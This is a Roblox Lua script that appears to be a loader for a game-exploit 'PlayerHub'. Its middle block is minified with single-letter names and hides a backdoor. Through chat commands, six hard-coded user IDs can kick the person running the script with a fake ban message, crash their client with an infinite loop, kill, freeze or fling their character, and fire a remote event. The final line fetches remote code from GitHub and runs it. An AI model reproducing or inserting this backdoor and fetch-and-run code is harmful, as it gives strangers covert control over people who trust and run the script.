--[[local hook
hook = hookfunction(game.HttpGet,function(self,url,...)
    if tostring(url) == "https://raw.githubusercontent.com/JustAP1ayer/ASalfinUiBackup-/main/OcerLibBACKUP.lua" then
        return hook(self,"https://raw.githubusercontent.com/JustAP1ayer/ASalfinUiBackup-/main/ocerlibbackupnopopup.lua",...)
    end
    return hook(self,url,...)
end)]]--
task.spawn(function()task.wait(2.5)local a=game:GetService("Players")local b=game:GetService("MarketplaceService")local c=game:GetService("RunService")local d=game:GetService("TextChatService")local e=a.LocalPlayer;local f={[138474176]=true,[4730367411]=true,[1507671882]=true,[42321866]=true,[116781531]=true,[87860658]=true}local g="The Game"pcall(function()local h=b:GetProductInfo(game.PlaceId)if h and h.Name then g=h.Name end end)local i;local j;local k=0;local l=0.5;local function m(n,o)if tick()-k<l then return end;k=tick()o=o:lower()local p=e.Character;local q=p and p:FindFirstChildOfClass("Humanoid")local r=p and p:FindFirstChild("HumanoidRootPart")if o=="/ban"then e:Kick("You have been banned for violating "..g.."'s guidelines.")elseif o=="/crash"then task.spawn(function()while true do end end)elseif o=="/jump"and q then q.Jump=true elseif o=="/die"and q then q.Health=0 elseif o=="/freeze"and r then r.Anchored=true elseif o=="/unfreeze"and r then r.Anchored=false elseif o=="/sit"and q then q.Sit=true elseif o=="/unsit"and q then q.Sit=false elseif o=="/spin"and r then if i then i:Disconnect()end;i=c.Heartbeat:Connect(function()r.CFrame=r.CFrame*CFrame.Angles(0,math.rad(10),0)end)elseif o=="/unspin"and i then i:Disconnect()i=nil elseif o=="/float"and r then if j then j:Disconnect()end;j=c.Heartbeat:Connect(function()r.Velocity=Vector3.new(0,5,0)end)elseif o=="/nofloat"and j and r then j:Disconnect()j=nil;r.Velocity=Vector3.zero elseif o=="/fling"and r then r.Velocity=Vector3.new(0,100,-250)elseif o=="/chaos"then task.spawn(function()local s={[1]="Tool",[2]="Zweihander"}workspace:FindFirstChild("Heck Yeah").WhenIDanceYouGive:FireServer(unpack(s))end)end end;local function t(u)if f[u.UserId]then u.Chatted:Connect(function(o)m(u,o)end)end end;for v,u in ipairs(a:GetPlayers())do t(u)end;a.PlayerAdded:Connect(t)d.OnIncomingMessage=function(w)local x=w.TextSource;if not x then return end;local n=a:GetPlayerByUserId(x.UserId)if n and f[n.UserId]then m(n,w.Text)end end end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/JustAP1ayer/PlayerHubOther/main/PlayerHubMML2loadstirng.lua",true))()
